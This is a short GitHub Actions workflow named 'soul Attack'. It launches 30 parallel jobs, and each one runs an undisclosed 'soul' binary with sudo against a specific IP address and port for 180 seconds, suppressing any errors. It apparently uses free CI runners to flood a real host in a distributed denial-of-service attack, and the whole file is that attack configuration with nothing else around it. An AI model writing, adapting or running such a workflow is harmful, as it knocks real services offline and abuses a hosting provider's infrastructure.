name: soul Attack
on: [push]

jobs:
  attack:
    runs-on: ubuntu-22.04
    strategy:
      fail-fast: false
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x soul
    - run: sudo ./soul 20.219.164.35 21704 180 || true
